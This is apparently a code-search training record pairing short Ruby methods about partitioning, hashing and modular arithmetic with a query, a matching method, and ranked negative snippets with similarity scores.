"def slice_fill!(remaining_partitions)\n # Total number of sites that need to be distributed\n total_sites_remaining = remaining_partitions.total_sites\n total_free_space = self.total_free_space\n\n # Fill each bin starting with the least filled\n self.each do |bin|\n\n # How many sites need to go into the current bin\n number_of_sites = ((@operations_lower_bound - bin.size).to_f / total_free_space * total_sites_remaining).ceil # FIXME: It's probably better to round down and save overflow in last bin\n\n # Fill \"number_of_sites\" sites taken from \"remaining_partitions\" into the bin. The rest stays in \"remaining_partitions\"\n dropped_partitions = remaining_partitions.drop_sites!(number_of_sites)\n bin.add!(dropped_partitions)\n end\n end",
"def set_values\n\t\tself.avg_price = set_avg_price\n\t\tself.avg_bath = set_avg_bath\n\t\tself.avg_bed = set_avg_bed\n\t\tself.avg_size = set_avg_size\n\tend",
"def each(*args, &block)\n @partition.each(*args, &block)\n end",
"def add_partition_to_node( tp, node )\n\n @nodes_lists_replicas[node][tp] = ''\n @partitions_lists[tp]['replicas'] ||= {}\n @partitions_lists[tp]['replicas'][node] = ''\n end",
"def store_values\n self.parent.write_attribute(self.field_name, self.ids)\n end",
"def set_lower_bound!(partitions)\n @operations_lower_bound = (partitions.op_optimized_size.to_f / @list.size).ceil\n @operations_rounding_adjustment = @operations_lower_bound * @list.size - partitions.op_optimized_size\n @sites_lower_bound = (partitions.total_sites.to_f / @list.size).ceil\n @sites_rounding_adjustment = @sites_lower_bound * @list.size - partitions.total_sites\n end",
"def _save_set_values(h)\n @values = h\n end",
"def _save_set_values(h)\n @values = h\n end",
"def set_Part(value)\n set_input(\"Part\", value)\n end",
"def set_Part(value)\n set_input(\"Part\", value)\n end",
"def set_Part(value)\n set_input(\"Part\", value)\n end",
"def set_Part(value)\n set_input(\"Part\", value)\n end",
"def set_Part(value)\n set_input(\"Part\", value)\n end",
"def set_Part(value)\n set_input(\"Part\", value)\n end",
"def set_Part(value)\n set_input(\"Part\", value)\n end",
"def set_Part(value)\n set_input(\"Part\", value)\n end",
"def set_Part(value)\n set_input(\"Part\", value)\n end",
"def set_Part(value)\n set_input(\"Part\", value)\n end",
"def set_Part(value)\n set_input(\"Part\", value)\n end",
"def set_Part(value)\n set_input(\"Part\", value)\n end",
"def set_Part(value)\n set_input(\"Part\", value)\n end",
"def set_Part(value)\n set_input(\"Part\", value)\n end",
"def set_Part(value)\n set_input(\"Part\", value)\n end",
"def set_Part(value)\n set_input(\"Part\", value)\n end",
"def set_Part(value)\n set_input(\"Part\", value)\n end",
"def set_Part(value)\n set_input(\"Part\", value)\n end"
] |
[
"0.5762416",
"0.5667353",
"0.566424",
"0.5646707",
"0.5622374",
"0.5546669",
"0.5455992",
"0.5372267",
"0.5271329",
"0.525934",
"0.5230752",
"0.51615244",
"0.51250994",
"0.50517833",
"0.505155",
"0.5036472",
"0.5034609",
"0.5030784",
"0.50031763",
"0.50018364",
"0.49964488",
"0.4996121",
"0.49835724",
"0.4981822",
"0.49727532",
"0.49354285",
"0.4921034",
"0.48872793",
"0.48590082",
"0.48589292",
"0.48586738",
"0.48306066",
"0.48268396",
"0.4816385",
"0.48098156",
"0.48087654",
"0.479774",
"0.47748336",
"0.47641897",
"0.47536764",
"0.4750542",
"0.47248584",
"0.47215983",
"0.47181734",
"0.47179073",
"0.47126132",
"0.47093338",
"0.46944132",
"0.46931237",
"0.46912736",
"0.4685708",
"0.46709523",
"0.46667793",
"0.46619633",
"0.46615696",
"0.46514145",
"0.46514145",
"0.46359625",
"0.4632887",
"0.4607363",
"0.45972767",
"0.4593251",
"0.45901173",
"0.4589061",
"0.45881072",
"0.4584153",
"0.4584153",
"0.4584153",
"0.45831496",
"0.4565549",
"0.4560663",
"0.45603874",
"0.45588526",
"0.45574",
"0.45524332",
"0.45385197",
"0.45317578",
"0.45309642",
"0.45264894",
"0.4511187",
"0.45009536",
"0.4500661",
"0.4500661",
"0.44979396",
"0.44979396",
"0.44979396",
"0.44979396",
"0.44979396",
"0.44979396",
"0.44979396",
"0.44979396",
"0.44979396",
"0.44979396",
"0.44979396",
"0.44979396",
"0.44979396",
"0.44979396",
"0.44979396",
"0.44979396",
"0.44979396",
"0.44979396"
] |
0.0
|
-1
|
Assumes hash partitioning, sets the modulus for this parition.
|
def modulus(v)
@modulus = v
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def modulo(p0) end",
"def modulus\n distance_to(origin)\n end",
"def rehash(oldhash, size)\n (oldhash + 1) % size\n end",
"def divmod(p0) end",
"def partition_proposition(proposition)\n @remainder &= proposition\n @left &= proposition\n @right &= proposition\n end",
"def modulo(other)\n self % other\n end",
"def saveThePrisoner(n, m, s)\n mod = (m % n == 0) ? n : (m % n)\n return ((mod + s -1) % n == 0) ? n : (mod + s -1) % n\n\nend",
"def divmod(val); end",
"def modulo(other)\n Modulo.new(self, other)\n end",
"def remainder(p0) end",
"def saveThePrisoner(n, m, s)\n res = ((m - 1) + s) % n\n res == 0 ? n : res \nend",
"def modulus(d, e)\n puts \"MODULUS #{d} % #{e}\"\n return d % e\nend",
"def mod(first_number, second_number)\n first_number % second_number\nend",
"def modulus\n\tputs (5%3)\n\tputs ( -5 % 3)\n\tputs (5 % 3)\n\tputs (-5 % -3)\n\nend",
"def modulo(arg0)\n end",
"def modulo(arg0)\n end",
"def hash_values\n [@modulus, @remainder]\n end",
"def my_modulo(dividend, divisor)\r\n # your code goes here\r\n # use of modulo operator\r\n\r\n dividend % divisor\r\nend",
"def initialize\n #Public key is @e, @n\n #Private key is @d, @n\n p = OpenSSL::BN::generate_prime(Bits)\n p = p.to_i\n q = OpenSSL::BN::generate_prime(Bits)\n q = q.to_i\n @n = p * q\n et = (p-1) * (q-1)\n @e = 3\n @d = modinv(@e, et)\n end",
"def modpow( base, exponent, modulus )\n result = 1\n while exponent > 0\n result = ( base * result ) % modulus unless ( ! exponent.bit_set? 0 )\n base = ( base * base ) % modulus\n exponent >>= 1\n end\n result\n end",
"def modpow( base, exponent, modulus )\n result = 1\n while exponent > 0\n result = ( base * result ) % modulus unless ( ! exponent.bit_set? 0 )\n base = ( base * base ) % modulus\n exponent >>= 1\n end\n result\n end",
"def mod(n, m)\n return ((n % m) + m) % m\nend",
"def remainder(val); end",
"def mod11(number); end",
"def set_partition\n @partition = Partition.find(params[:id])\n end",
"def hashfunction(key, size)\n #key.hash % size\n key % size\n end",
"def remainder(v)\n @remainder = v\n end",
"def modulo_of(fraction); end",
"def divmod(arg0)\n end",
"def divmod(arg0)\n end",
"def rank=(m)\n @rank = m % (1 << size)\n end",
"def rank=(m)\n @rank = m % factorial(size)\n end",
"def modulo(y)\n mod(y, ZERO)\n end",
"def update!(**args)\n @partition_key = args[:partition_key] if args.key?(:partition_key)\n end",
"def mod(x, y)\n raise NotImplementedError\n end",
"def hash\r\n a = 0\r\n @id.each_byte {|c| a += c.to_i}\r\n (a + @paired.to_i) * HASH_PRIME\r\n end",
"def modular_function\n num_1 % num_2\n return num_1 % num_2\nend",
"def update!(**args)\n @partition_count = args[:partition_count] if args.key?(:partition_count)\n end",
"def mersenne_prime(num)\nend",
"def calculate_random_partitioner_token(key)\n number = Digest::MD5.hexdigest(key).to_i(16)\n\n if number >= (2**127)\n # perform two's complement, basically this takes the absolute value of the number as\n # if it were a 128-bit signed number. Equivalent to Java BigInteger.abs() operation.\n result = (number ^ (2**128)-1) + 1\n else\n # we're good\n result = number\n end\n\n result\n end",
"def position(x) #x will be the Hashable object\r\n return x.hashvalue % @size\r\n end",
"def mod(num1, num2)\n num2.to_f % num1.to_f;\nend",
"def modulo(dividend, divisor)\n puts \"#{dividend} % #{divisor} = #{dividend.modulo(divisor)}\\n\"\nend",
"def secret f\n f.mod_exp(self.x, self.p)\n end",
"def is_divisible_using_hashing(arr, k)\n n = arr.length\n hsh = {}\n # collect reminders and their occurences\n for i in 0...n\n if hsh[arr[i] % k]\n hsh[arr[i] % k] += 1\n else\n hsh[arr[i] % k] = 1 \n end \n end\n\n # traverse array again to check reminders with following possiblities\n # 1. if reminder is 0, then its occurence must be > 1\n # 2. if reminder divides k in two halves, then its occurence must be > 1\n # 3. if reminder occurence is same as k - reminder occurence\n\n for i in 0...n\n rem = arr[i] % k\n if rem * 2 == k || rem == 0\n if hsh[rem] == 1\n return false\n end \n else\n if hsh[rem] != hsh[k-rem]\n return false\n end \n end \n end \n true\nend",
"def mod(interpreter)\n stack = interpreter.stack\n a = stack.pop\n b = stack.pop\n stack.push(b%a) if a && b\n end",
"def changepartition(partition, filename)\n\tbaseaddress = PARTITIONS['boot'][START]\t\n\tsize = partition[SIZE]\n\tpartdata = Flashimage.read(filename)\n\tlength = partdata.size\n\tlast = partition[SIZE]\n\traise('Input file too large.') if length + 12 > last\n\tcrc32 = Zlib.crc32(partdata)\n\tpartdata[length ... last - 12] = \"\\xff\" * (last - length - 12)\n\tpartdata[last - 12 ... last] = [length, 0x12345678, crc32].pack('V3')\n\tfilename = \"#{File.dirname(FLASHIMAGE)}/#{partition[FILE]}\"\n\tFlashimage.write(partdata, filename)\nend",
"def inv_mod x,n\n d,r,s = gcd2 x,n\n if d==1\n r % n\n else\n 0\n end\nend",
"def partition_for!(key)\n if leader_available?\n # Use the configured partitioner\n partition_id = partitioner.call(key, available_partitions.count, partitions.count)\n partition!(partition_id)\n else\n error_code.raise\n end\n end",
"def prime_data(position:, value:)\n @intcode[position] = value\n end",
"def partition(ia, left, h)\n piv = ia[h] #choose the pivot as the furthest value\n i = left - 1 #set i to the index of the lowest value\n temp = 0 #temporary swapping variable\n\n for j in left..(h-1) #for j goes from low to high index..\n if(ia[j] < piv) #if the current value that we are looking at is les than the pivot...\n i += 1 #add one to the lowest position counter...\n\n #swap those two values\n ia[i],ia[j] = ia[j],ia[i]\n\tend\n end\n #swap so partition is in the middle\n ia[i+1],ia[h] = ia[h],ia[i+1]\n\n return (i+1)\nend",
"def div_h_p_nr(a,b)\n p = 0\n\n @bits.times do\n if p < 0\n # (i-a) shift combined pa register left one bit\n pa = ((p<<@bits)|a)<<1\n # (ii-a) p=p+b\n a = pa & @mA\n p = signed((pa & @mP) >> @bits)\n p += b\n else\n # (i-b) shift combined pa register left one bit\n pa = ((p<<@bits)|a)<<1\n # (ii-b) p=p-b\n a = pa & @mA\n p = signed((pa & @mP) >> @bits)\n p -= b\n if (p < 0)\n# Tests pass if the following is uncommented\n# # (iv) restore p\n# p += b\n else\n # (iii) if p >= 0\n a |= 1\n end\n end\n end\n # FIXME - need a test case that exercises this last step\n if p < 0\n p += b\n end\n [lo(a),lo(p)]\n end",
"def mod\n x, y = stack.pop(2)\n push x % y\n end",
"def key_for(params, id, length = 32)\n pset = {\n :iters => params.iterations,\n :salt => params.salt\n }\n @keys[pset] = { :master => master_key_for(params) } unless @keys[pset]\n return @keys[pset][id] if @keys[pset][id]\n @keys[pset][id] = hkdf_expand(@keys[pset][:master], \"1:#{id}\", length)\n end",
"def inverse_modulo(n)\n\t\treturn nil unless self.gcd(n) == 1\n\t\t(n.extended_gcd(self).last) % n\n\tend",
"def kidmod10(base); end",
"def [](num) #<== maybe requires hash\n # num_hash = num.hash\n # @store[num_hash % num_buckets]\n @store[num % num_buckets]\n end",
"def prime_factorization(num)\n \nend",
"def prime_factorization(num)\n \nend",
"def prime_factorization(num)\n \nend",
"def secret f\n f.mod_exp(self.x, self.p)\n end",
"def partition(a,p,r)\n i = p-1\n key = a[r]\n for j in p..r-1\n if(a[j]<=key)\n i = i + 1\n temp = a[i]\n a[i] = a[j]\n a[j] = temp\n end\n end\n temp = a[i+1]\n a[i+1] = a[r]\n a[r] = temp\n return i+1\nend",
"def mod_hash(hash)\n modicado = {}\n hash.each { |plato, valor| modicado[plato] = valor.to_f * 1.19 }\n modicado\nend",
"def set_mod_list(k, s)\n arr = []\n k.times do |i|\n arr.push(s.count { |a| a % k == i })\n end\n arr\nend",
"def index(key, size)\n i = key.sum % size \n end",
"def mod(signal)\n self.class.new(self, signal) { |a, b| a % b }\n end",
"def partition_private(leftmost_index, rightmost_index)\n i = leftmost_index + 1\n pivot = self[leftmost_index] # the pivot can be chosen a number of different ways\n j = i\n while j <= rightmost_index\n # if the value is less than the pivot value, go search\n if self[j] < pivot\n self[i], self[j] = self[j], self[i]\n i += 1\n end\n j += 1\n end\n # puts the pivot into the correctly sorted area\n self[leftmost_index], self[i - 1] = self[i - 1], self[leftmost_index]\n i - 1\n end",
"def hash_this(word)\n\t\tdigest = Digest::MD5.hexdigest(word) # get the hex version of the MD5 for the specified string\n\t\tdigest[@offset, @digits].to_i(16) % @max_value # offset it using the initial seed value and get a subset of the md5. then modulo it to get the bit array location\n\tend",
"def hashit\n n = 0\t \n (\"A\"..\"Z\").each do |x|\n @rotor_hash[x] = @rotor_array[n]\n n += 1\n end \n return @rotor_hash\n end",
"def rehash() end",
"def prime_factorization(num)\nend",
"def sign_block(key_private, timestamp)\r\n # RSA Encryption (Formula: C = M^d mod n)\r\n timestamp = timestamp.to_i % key_private[1].to_i\r\n signature = timestamp.to_bn.mod_exp(key_private[0],key_private[1])\r\n return signature\r\nend",
"def replace_weight(_test_digits)\n return modulus_weight\n end",
"def initialize(exponent_hex_string, modulus_hex_string)\n @e = BigNum.from_hex exponent_hex_string\n @n = BigNum.from_hex modulus_hex_string\n @size = (@n.to_hex.length + 1) / 2\n @chunk_cache = {}\n end",
"def __remainder=(v) # only keep relevant bits of the remainder\n if v != 0\n num_bits = self.class.type.size * 8\n num_used_bits = self.class.map.value.collect { |v, _, _| v }.select { |v| v > 0 }.sum(:+)\n if num_used_bits < num_bits\n v &= ((( 1 << (num_bits - num_used_bits)) - 1) << num_used_bits)\n else\n v = 0\n end\n end\n @__remainder = v\n end",
"def func_mod(args)\n p1 = _eval(car(args))\n p2 = _eval(car(cdr(args)))\n\n if p1.type != LObject::OBJ_INTEGER or p2.type != LObject::OBJ_INTEGER\n if @lint\n Error.warn(\"warning: modulo with a non integer operand\")\n end\n return @o_man.nil\n end\n\n p3 = @o_man.new_object(LObject::OBJ_INTEGER)\n if p2.value.i == 0\n if @lint\n Error.warn(\"warning: modulo by zero\")\n end\n p3.value.i = 0\n else\n p3.value.i = p1.value.i % p2.value.i\n end\n\n return p3\n end",
"def hash99999\n return nil unless @parts\n\n k = construct\n return nil unless k\n\n Digest::SHA256.hexdigest(construct[0..-6] << '99999')[0..23]\n end",
"def set_part\n @part = Part.find(params[:id])\n # authorize(@part)\n end",
"def index(key, size) #take the asscii value % size to come up with index\n total = 0\n key.each_byte do |c|\n total = c + total\n end\n total % size\n\n end",
"def select_using_hash(chapter,probs,year,semester,student_id)\n # year = 2014, etc.; semester = \"s\" or \"f\"\n chapter = chapter.to_s\n year = year.to_i\n semester = semester.to_s\n student_id = student_id.to_s\n # figure out an integer for the semester, counting from spring 2014 = 0\n s = (year-2014)*2;\n if semester==\"f\" then s=s+1 end\n x = student_id+\",\"+chapter+\",\"+probs.join(\":\")\n hash = md5_hash_hex(x); # 32 hex digits\n hex4 = hash.to_s[-4..-1]\n k = hex4.to_i(16) # convert hex string to fixnum\n k = k+s; # if a student is repeating the course, cycle through the problems, don't assign same one\n n = probs.length;\n return k%n;\nend",
"def update!(**args)\n @per_partition_bytes = args[:per_partition_bytes] if args.key?(:per_partition_bytes)\n @period = args[:period] if args.key?(:period)\n end",
"def hash\n num = @high << 64\n num |= @low\n num.hash\n end",
"def partition(cluster_hash)\n data = {}\n h1 = {}\n cluster_hash.sort.to_h.each { |_num2, h2|\n h2.each_key{ |k|\n h1[k] = []\n cluster_hash.sort.to_h.each { |num3, h3|\n if h1[k].map {|e| e['value']}.include?(h3[k])\n num = (h1[k].select { |e| e['value'] == h3[k] }).first['num']\n h1[k].delete_if { |e| e['value'] == h3[k] }\n h1[k] += [{ 'num' => num + num3, 'value' => h3[k], 'cell' => \"#{G5K.nodeset(num + num3)}: #{h3[k]}\", 'sort' => \"#{h3[k]}\"}]\n else\n h1[k] += [{ 'num' => num3, 'value' => h3[k], 'cell' => \"#{G5K.nodeset(num3)}: #{h3[k]}\", 'sort' => \"#{h3[k]}\"}]\n end\n }\n h1[k].first['cell'] = h1[k].first['cell'].split(': ')[1] if h1[k].count == 1\n data[k] = h1[k].sort_by{ |e| e['num'].sort[0] }\n }\n }\n data\nend",
"def increment_bucket(bucket)\n (bucket + 1) % table.length\n end",
"def partition(partition_key)\n state_depth_must_be(States::RELATION)\n if @current_relation.partitions.include?(partition_key)\n raise \"duplicate partition key #{partition_key}\"\n end\n @current_relation.partitions << partition_key\n end",
"def rotate!\n @num_rotations = (@num_rotations+1) % NUM_SIDES\n end",
"def index(key, size)\n #true_index = hash(key) % k\n code = 0\n key.split(%r{\\s*}).each do |letter|\n code += letter.ord \n end\n puts code\n return code % size\n\n end",
"def legendre(n, modulus)\n fail ArgumentError, 'Composite modulus' unless modulus.prime?\n return 0 if n.zero?\n factor(n).map { |p, e| prime_legendre p**e, modulus }.inject :*\n end",
"def gen_key\n # get 2 random primes\n p, q = Prime.each.take_while {|x| x <= KEY_SPACE}.sample(2)\n # special easy case of Euler's totient function\n phi = (p-1)*(q-1)\n # calculate modulus, public key, and private key\n n = p*q\n e = get_public(phi)\n d = get_private(phi, e)\n # print results\n puts \"modulus: #{n}\"\n puts \"public key: #{e}\"\n puts \"private key: #{d}\"\n puts \"(internal information)\"\n puts \"phi: #{phi}\"\n puts \"p,q: #{p},#{q}\"\nend",
"def index(key, size)\n return key.sum % size \n end",
"def calculate_hash(input, prep_hashes)\n result = 0\n input.unpack('U*').each do |x|\n result += prep_hashes.hash(x)\n end\n (result % MOD_VALUE).to_s(HEX)\nend",
"def get_d e\n\t\t@e_public_key = e\n\t\tcurrent_mod_z = nil\n\n\t\tbegin\n\t\t\tcurrent_mod_z = current_mod_z ? (current_mod_z + @z) : @z\n\t\t\t@d_secret_key = (current_mod_z + 1) / @e_public_key\n\t\t\tdivision_mod = (current_mod_z + 1) % @e_public_key\n\t end while not (division_mod == 0 and @e_public_key != @d_secret_key)\n\n\t\t@d_secret_key\n\tend",
"def invmod(e, et)\n g, x = extended_gcd(e, et)\n if g != 1\n raise 'The maths are broken!'\n end\n x % et\nend",
"def invmod(e, et)\n g, x = extended_gcd(e, et)\n if g != 1\n raise 'The maths are broken!'\n end\n x % et\nend",
"def initial_particle_assignment\r\n array = 0.upto(@length - 1).to_a\r\n array = array.shuffle\r\n (0..@length - 1).each do |x|\r\n student = array[x]\r\n @position[student][x % @teams] = 1\r\n end\r\n end",
"def hash\n super ^ number.hash\n end",
"def math_parrot(number1, number2)\n number1 + number2\nend",
"def divisible_by(a, b, k)\n a = k if a < k\n\n x = ((b-a)/k)\n x += 1 if a % k == 0\n\n #n = 0\n #(a..b).each do |i|\n # n += 1 if i % k == 0\n #end\n return x\nend",
"def calculate_hash!\n prefix = PREFIX_NAME_LOOKUP[self.type]\n # add special cases for refs\n self.hash_id = NodeId.sha1(\"#{prefix} #{self.size}\\0#{self.content}\")\n end",
"def partition\n PredicatePartition.new(predicate, operand.left.header, operand.right.header)\n end"
] |
[
"0.6106353",
"0.59064716",
"0.58948857",
"0.5822578",
"0.57684463",
"0.55961597",
"0.55376786",
"0.54671663",
"0.5466879",
"0.54487014",
"0.5404215",
"0.5349049",
"0.53391105",
"0.53174484",
"0.526858",
"0.526858",
"0.5246383",
"0.52278817",
"0.5220499",
"0.5183994",
"0.5183994",
"0.5180358",
"0.51526755",
"0.5139453",
"0.51340914",
"0.51093936",
"0.50954443",
"0.50923145",
"0.5067067",
"0.5067067",
"0.5043158",
"0.5042117",
"0.5041193",
"0.5030048",
"0.5029297",
"0.50278634",
"0.4990163",
"0.49518362",
"0.49357358",
"0.4925539",
"0.49244884",
"0.4923425",
"0.49058154",
"0.4900827",
"0.48946014",
"0.4881916",
"0.48785317",
"0.48780558",
"0.48663908",
"0.48636487",
"0.48508766",
"0.48503044",
"0.484642",
"0.48388407",
"0.4833827",
"0.48282155",
"0.4817667",
"0.48115575",
"0.48115575",
"0.48115575",
"0.48077613",
"0.4792897",
"0.47914767",
"0.47910264",
"0.47885466",
"0.47831967",
"0.47812763",
"0.4779003",
"0.47761685",
"0.47760344",
"0.47749504",
"0.4758439",
"0.47438407",
"0.4742004",
"0.47415036",
"0.47371235",
"0.47233912",
"0.47039622",
"0.4703372",
"0.46992224",
"0.4695534",
"0.46840817",
"0.46682593",
"0.46613884",
"0.46570444",
"0.4655194",
"0.46545666",
"0.46466625",
"0.46430388",
"0.46418992",
"0.46371785",
"0.46284285",
"0.46211243",
"0.46211243",
"0.46180335",
"0.4617875",
"0.46111393",
"0.4607527",
"0.45932907",
"0.45926777"
] |
0.7081045
|
0
|
Assumes hash partitioning, sets the remainder for this parition.
|
def remainder(v)
@remainder = v
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def partition_proposition(proposition)\n @remainder &= proposition\n @left &= proposition\n @right &= proposition\n end",
"def rehash(oldhash, size)\n (oldhash + 1) % size\n end",
"def set_partition\n @partition = Partition.find(params[:id])\n end",
"def partition(ia, left, h)\n piv = ia[h] #choose the pivot as the furthest value\n i = left - 1 #set i to the index of the lowest value\n temp = 0 #temporary swapping variable\n\n for j in left..(h-1) #for j goes from low to high index..\n if(ia[j] < piv) #if the current value that we are looking at is les than the pivot...\n i += 1 #add one to the lowest position counter...\n\n #swap those two values\n ia[i],ia[j] = ia[j],ia[i]\n\tend\n end\n #swap so partition is in the middle\n ia[i+1],ia[h] = ia[h],ia[i+1]\n\n return (i+1)\nend",
"def update!(**args)\n @partition_key = args[:partition_key] if args.key?(:partition_key)\n end",
"def __remainder=(v) # only keep relevant bits of the remainder\n if v != 0\n num_bits = self.class.type.size * 8\n num_used_bits = self.class.map.value.collect { |v, _, _| v }.select { |v| v > 0 }.sum(:+)\n if num_used_bits < num_bits\n v &= ((( 1 << (num_bits - num_used_bits)) - 1) << num_used_bits)\n else\n v = 0\n end\n end\n @__remainder = v\n end",
"def update!(**args)\n @partition_count = args[:partition_count] if args.key?(:partition_count)\n end",
"def partition(arr, left, right, pivot)\n pivot_val = arr[pivot]\n arr[pivot] = arr[right]\n arr[right] = pivot_val\n\n storage = left\n\n (left..right-1).each do |i|\n if arr[i] < pivot_val\n storage_val = arr[storage]\n arr[storage] = arr[i]\n arr[i] = storage_val\n storage += 1\n end\n end\n\n storage_val = arr[storage]\n arr[storage] = arr[right]\n arr[right] = storage_val\n\n storage\nend",
"def on_partitions_assigned(_, partitions)\n @assigned_partitions = partitions.to_h.transform_values { |part| part.map(&:partition) }\n @changed = true\n end",
"def partition_for!(key)\n if leader_available?\n # Use the configured partitioner\n partition_id = partitioner.call(key, available_partitions.count, partitions.count)\n partition!(partition_id)\n else\n error_code.raise\n end\n end",
"def partition(partition_key)\n state_depth_must_be(States::RELATION)\n if @current_relation.partitions.include?(partition_key)\n raise \"duplicate partition key #{partition_key}\"\n end\n @current_relation.partitions << partition_key\n end",
"def partition(cluster_hash)\n data = {}\n h1 = {}\n cluster_hash.sort.to_h.each { |_num2, h2|\n h2.each_key{ |k|\n h1[k] = []\n cluster_hash.sort.to_h.each { |num3, h3|\n if h1[k].map {|e| e['value']}.include?(h3[k])\n num = (h1[k].select { |e| e['value'] == h3[k] }).first['num']\n h1[k].delete_if { |e| e['value'] == h3[k] }\n h1[k] += [{ 'num' => num + num3, 'value' => h3[k], 'cell' => \"#{G5K.nodeset(num + num3)}: #{h3[k]}\", 'sort' => \"#{h3[k]}\"}]\n else\n h1[k] += [{ 'num' => num3, 'value' => h3[k], 'cell' => \"#{G5K.nodeset(num3)}: #{h3[k]}\", 'sort' => \"#{h3[k]}\"}]\n end\n }\n h1[k].first['cell'] = h1[k].first['cell'].split(': ')[1] if h1[k].count == 1\n data[k] = h1[k].sort_by{ |e| e['num'].sort[0] }\n }\n }\n data\nend",
"def partition_private(leftmost_index, rightmost_index)\n i = leftmost_index + 1\n pivot = self[leftmost_index] # the pivot can be chosen a number of different ways\n j = i\n while j <= rightmost_index\n # if the value is less than the pivot value, go search\n if self[j] < pivot\n self[i], self[j] = self[j], self[i]\n i += 1\n end\n j += 1\n end\n # puts the pivot into the correctly sorted area\n self[leftmost_index], self[i - 1] = self[i - 1], self[leftmost_index]\n i - 1\n end",
"def rehash() end",
"def greedy1_initial!(remaining_partitions)\n # Initialize\n site_list = remaining_partitions.sites\n site_index = 0\n partition_index = 0\n total_sites_remaining = remaining_partitions.total_sites\n\n\n total_free_space = self.total_free_space\n\n # Fill each bin starting with the least filled\n self.each_with_index do |bin, bin_index|\n\n # How many sites need to go into the current bin\n sites_for_bin = ((@operations_lower_bound - bin.size).to_f / total_free_space * total_sites_remaining).floor\n\n # Pick (random) site of partition, add to bin and drop from \"remaining_partitions\"\n dropped_partition = remaining_partitions.list.values[partition_index].drop_random_site!\n bin.add!([dropped_partition])\n\n # Do we need to fill two partitions in this bin?\n if site_list[site_index].values.first != site_list[site_index + sites_for_bin - 1].values.first\n partition_index += 1\n\n # Pick (random) site of partition, add to bin and drop from \"remaining_partitions\"\n dropped_partition = remaining_partitions.list.values[partition_index].drop_random_site!\n bin.add!([dropped_partition])\n\n elsif bin_index < @list.size - 1 # Prevent index out of bound\n # Is there a partition switch directly at the beginning of the next bin?\n if site_list[site_index + sites_for_bin - 1].values.first != site_list[site_index + sites_for_bin].values.first\n partition_index += 1\n end\n end\n\n site_index += sites_for_bin\n end\n\n remaining_partitions\n end",
"def partition(a,p,r)\n i = p-1\n key = a[r]\n for j in p..r-1\n if(a[j]<=key)\n i = i + 1\n temp = a[i]\n a[i] = a[j]\n a[j] = temp\n end\n end\n temp = a[i+1]\n a[i+1] = a[r]\n a[r] = temp\n return i+1\nend",
"def greedy1_initial_alt2!(remaining_partitions)\n\n virtual_remaining_partitions = DeepClone.clone remaining_partitions\n\n sites_in_current_partition = 0\n # Fill each bin starting with the least filled\n self.each_with_index do |bin, bin_index|\n\n free_space = (@operations_lower_bound - bin.size)\n\n # condition can be equal since the first remaining partition might be split\n dropped_partitions = if virtual_remaining_partitions.first.op_optimized == free_space || (virtual_remaining_partitions.size == 1 && virtual_remaining_partitions.first.op_optimized <= free_space)\n virtual_remaining_partitions.drop!(1)\n sites_in_current_partition = 0\n elsif virtual_remaining_partitions.first.op_optimized < free_space\n partition = virtual_remaining_partitions.drop!(1).first\n sites_in_current_partition = virtual_remaining_partitions.first.sites.size\n space_per_site = (virtual_remaining_partitions.first.op_optimized / sites_in_current_partition).floor\n [partition,\n virtual_remaining_partitions.drop_sites!(((free_space - partition.op_optimized).to_f/space_per_site).ceil, compute = false)]\n else\n sites_in_current_partition = virtual_remaining_partitions.first.sites.size if sites_in_current_partition == 0\n space_per_site = (virtual_remaining_partitions.first.op_optimized / sites_in_current_partition).floor\n virtual_remaining_partitions.drop_sites!((free_space.to_f/space_per_site).ceil, compute = false)\n end\n\n # Phase 2: Add site in the middle of each partition to the bin\n dropped_partitions.each do |partition|\n # Get site in the middle of partition\n mid_site = partition.sites[partition.sites.size / 2]\n\n # Actual assignment of site\n dropped_partition = remaining_partitions.list[partition.name].drop_specific_site!(mid_site)\n bin.add!([dropped_partition])\n end\n end\n\n remaining_partitions\n end",
"def changepartition(partition, filename)\n\tbaseaddress = PARTITIONS['boot'][START]\t\n\tsize = partition[SIZE]\n\tpartdata = Flashimage.read(filename)\n\tlength = partdata.size\n\tlast = partition[SIZE]\n\traise('Input file too large.') if length + 12 > last\n\tcrc32 = Zlib.crc32(partdata)\n\tpartdata[length ... last - 12] = \"\\xff\" * (last - length - 12)\n\tpartdata[last - 12 ... last] = [length, 0x12345678, crc32].pack('V3')\n\tfilename = \"#{File.dirname(FLASHIMAGE)}/#{partition[FILE]}\"\n\tFlashimage.write(partdata, filename)\nend",
"def partition(a,l,r)\n pivot = a[r]\n i = l\n p_index = l\n\n while i < r\n if a[i] <= pivot\n temp = a[i]\n a[i] = a[p_index]\n a[p_index] = temp\n p_index += 1\n end\n i += 1\n end\n temp = a[p_index]\n a[p_index] = a[r]\n a[r] = temp\n return p_index\nend",
"def greedy2_fill!(remaining_partitions)\n remaining_partitions.each do |src_partition|\n src_partition.sites.each do |site|\n\n smallest_bin = self.update_bin_sizes!.min\n target_partition = smallest_bin.list[src_partition.name]\n if target_partition.nil?\n smallest_bin.add!([Partition.new(src_partition.name, [site], src_partition.tree)])\n else\n target_partition.incr_add_sites!([site])\n end\n\n end\n end\n end",
"def partition(list, left, right, pivotIndex)\n pivotValue = list[pivotIndex]\n list[pivotIndex], list[right] = list[right], list[pivotIndex]\n storeIndex = left\n for i in (left...right) do\n if list[i] < pivotValue\n list[storeIndex], list[i] = list[i], list[storeIndex]\n storeIndex += 1\n end\n end\n list[right], list[storeIndex] = list[storeIndex], list[right]\n storeIndex\nend",
"def update!(**args)\n @per_partition_bytes = args[:per_partition_bytes] if args.key?(:per_partition_bytes)\n @period = args[:period] if args.key?(:period)\n end",
"def lock\n\t\t\tself.instance_eval do \n\t\t\t\tundef :same_piece_count=\n\t\t\t\tundef :difference_ids=\n\t\t\tend\n\t\tend",
"def add!(partition, dirty = false)\n if @list[partition.name].nil?\n @list[partition.name] = partition\n else\n @list[partition.name].merge!(partition, simulate = false, dirty)\n end\n self\n end",
"def add_to_partition(cand, match, partition)\n if !match.nil?\n partition[match] << cand\n @ident_viol_candidates = true\n else\n partition << [cand]\n end\n end",
